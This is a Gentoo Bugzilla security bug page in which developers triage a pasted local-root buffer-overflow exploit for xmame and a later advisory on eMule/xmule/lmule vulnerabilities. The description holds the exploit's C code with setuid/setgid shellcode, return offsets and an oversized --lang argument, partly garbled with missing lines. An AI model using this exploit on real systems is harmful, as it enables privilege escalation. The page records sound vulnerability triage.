Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 22255 - app-emulation/xmame
Summary: app-emulation/xmame
Alias: None
Product: Gentoo Linux
Classification: Unclassified
Component: New packages (show other bugs)
Hardware: All Linux
: Highest critical (vote)
Assignee: Gentoo Security
Depends on:
Reported: 2003-06-05 03:37 UTC by Daniel Ahlberg (RETIRED)
Modified: 2004-06-08 13:01 UTC (History)
1 user (show)

See Also:
Package list:
Runtime testing required: ---


Note You need to log in before you can comment on or make changes to this bug.
Description Daniel Ahlberg (RETIRED) gentoo-dev 2003-06-05 03:37:36 UTC
xmame gain root exploit 
"Gabriel A. Maggiotti" <> 
Saturday 16.36.41 
Web:                   Author: Gabriel A. Maggiotti 
Date: March 31, 2003                    E-mail: 
#include <stdio.h> 
#define OFFSET 1058 
#define NOP 0x90  
#define NOP1 'B'  
#define RET_70 0xbfffee00   
#define RET_72 0xbfffedf0   
main(int argc, char *argv[]) 
int i=0; char buf[OFFSET]; 
int c, ret; 
unsigned char shellcode1[] = 
"\x33\xDB\x33\xC0\xB0\x1B\xCD\x80" // alarm(0); 
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" // setuid(0); 
"\x31\xc0\x50\x50\xb0\xb5\xcd\x80" // setgid(0); 
        if(argc != 2) { 
                fprintf(stderr,"usage: %s <os_type> \n",argv[0]); 
                fprintf(stderr,"types:\n RedHat 7.0 - [1]"); 
                fprintf(stderr,"\n RedHat 7.2 - [2]\n\n"); 
                return 1; 
        switch(c) { 
                case 1: 
                        printf("Exploiting compress for RedHat 7.0\n"); 
                        ret = RET_70 - OFFSET; 
                case 2: 
                        printf("Exploiting compress for RedHat 7.2\n"); 
                        ret = RET_72 - OFFSET; 
        for(i=0;i<=OFFSET-1 ;i++) 
        for(i=OFFSET-301;i<=OFFSET-1 ;i+=4) 
        *(int *) &buf[i++] = ret; 
        execl("/usr/local/bin/xmame.x11", "/usr/local/bin/xmame.x11","--lang", buf, NULL); 
return 0; 
--------------------------------------------------------------------------- is dedicated to interactively researching vulnerab- 
ilities, report potential or undeveloped holes in any kind of computer system. 
To  subscribe to t send a blank  email  to More help  available  sending an email 
Note: the list doesn't allow html, it will be stripped from messages.  
Comment 1 SpanKY gentoo-dev 2003-06-23 07:57:14 UTC
what version of xmame does this exploit ?

i might also point out it only mentions redhat 7.x ...

and how exactly does this gain root ?  xmame isnt setuid (at least not on Gentoo)
Comment 2 Daniel Ahlberg (RETIRED) gentoo-dev 2003-08-20 02:19:01 UTC
                           e-matters GmbH 
                      -= Security  Advisory =- 
     Advisory: eMule/lmule/xmule multiple remote vulnerabilities 
 Release Date: 2003/08/17 
Last Modified: 2003/08/17 
       Author: Stefan Esser [] 
  Application: eMule <= 0.29c 
               xmule <= 1.4.3, <= 1.5.6a 
               lmule <= 1.3.1 
     Severity: Several vulnerabilities within emule and its unix ports 
               allow remote compromise of p2p users. 
         Risk: Critical 
Vendor Status: eMule Vendor has released a bugfixed version. 
               (no solution for lmule, because no support anymore 
               (no 100% solution for xmule) 
   eMule and its unix ports are the most famous filesharing clients which  
   are based on the eDonkey2000 network. The estimated usercount reaches 
   from 1 million to even 10 million p2p clients (according to a mldonkey 
   statistic). With such a large userbase eMule is not only a thorn in the 
   side of the music and movie industry but also an attractive target for 
   script kids or worm writers. And indeed auditing the source code revealed 
   vulnerabilities which can be abused to disturb the eMule network or to 
   takeover other client machines. 
   The eMule source code is object oriented which makes security auditing 
   from my point of view a lot harder because the flow of execution is not 
   obvious and it is first needed to get a general overview of the objects 
   and their dependencies.  
   While auditing the source code following bugs where discovered 
   1) OP_SERVERMESSAGE Format String Vulnerability          
      emule <= 0.29a 
      xmule <= 1.4.3, <= 1.5.4 
      lmule <= 1.3.1 
      When the client receives a message from the server it passes this  
      message to a function that expects a format string argument. This  
      could be used by a malicious server to crash or takeover the  
      connected client system. 
   2) OP_SERVERIDENT Heap Overflow                          
      emule <= 0.29a 
      xmule <= 1.4.3, <= 1.5.4 
      lmule <= 1.3.1 
      When receiving a serverident packet from the server it is parsed in 
      an unsafe manner that could lead to an exploitable heap overflow.  
      Again this allows a malicious server to crash or takeover the  
      connected client. 
   3) Servername Format String Vulnerabilities              
      emule <= 0.29c 
      xmule <= 1.4.2, <= 1.5.5 
      lmule <= 1.3.1 
      Several ways of adding a server with a name that contains format  
      string specifiers could crash the client. Remote code execution  
      through this bug is unlikely because only very short servernames  
      are accepted. 
   4) AttachToAlreadyKnown Object Destruction Vulnerability  
      emule <= 0.29c 
      xmule <= 1.4.2, <= 1.5.6a 
      lmule <= 1.3.1 
      When the client receives a special sequence of packets an  
      error situation can be triggered where the currently used  
      client object is deleted. This is similar to an ordinary 
      double free vulnerability with the exception that here a whole 
      object is mistakenly freed and still used. Because this hole 
      was proven to be exploitable (remote code execution) and the  
      same packets are completely legal for other clients (no IDS  
      signature can be created anyway), I am not going into details  
      how to trigger the bug. There are just too many vulnerable  
      systems out there. 
Proof of Concept: 
   e-matters is not going to release an exploit for this vulnerability to 
   the public. The developed exploit is considered extremly dangerous  
   because it uses a technique that allows to exploit this kind of double 
   free bugs on Windows 2K/XP systems without version or binary dependant 
   DCOM has shown again how devestating windows overflows are. Which is 
   caused by not patching users on the one hand and on the other hand by 
   an unsecure windows design that allows to exploit most vulnerabilities 
   with very few or without system dependant offsets. 
Disclosure Timeline: 
   26. July 2003   - First contact to emule and xmule Vendors. 
                     (xmule email bounced back after some time) 
   29. July 2003   - emule vendor has verified and fixed the bugs.  
                     New version is in betatests. 
   31. July 2003   - contact with xmule vendor establised. 
   02. August 2003 - xmule 1.5.6a (unstable) was released by the 
                     xmule vendor. This version fixes only (3). 
   11. August 2003 - xmule 1.4.3 (stable) was released by the xmule 
                     vendor. I mailed the vendor the same day, that 
                     it only fixes (3) and (4) while the first two 
                     are not fixed. No reaction yet. 
   17. August 2003 - emule vendor released version 0.30a which fixes 
                     all security bugs. Their changelog does not 
                     underline the importance of the update and is 
                     incorrectly stating problem (4) as only a  
   It is very important that word about this vulnerability is spread fast 
   in the eMule community, because P2P users are usually not reading  
   security mailinglists and will therefore be very slow in upgrading to new 
   versions of their favourite tools. If you connect to the network you can  
   still see a huge amount of very old clients. 
   And I hope the pressure of the xmule community can force the release 
   of an 100% fixed version. 
   I hope I do not need to remember the P2P users that the RIAA repeatetly 
   asked for the right to hack into their PCs. 
   pub  1024D/75E7AAD6 2002-02-26 e-matters GmbH - Securityteam 
   Key fingerprint = 43DD 843C FAB9 832A E5AB  CAEB 81F2 8110 75E7 AAD6 
Copyright 2003 Stefan Esser. All rights reserved. 
Comment 3 SpanKY gentoo-dev 2003-08-20 10:59:21 UTC
we've version bumped xmame twice since this was released, plus the binary isnt 
setuid, so this doesnt apply to us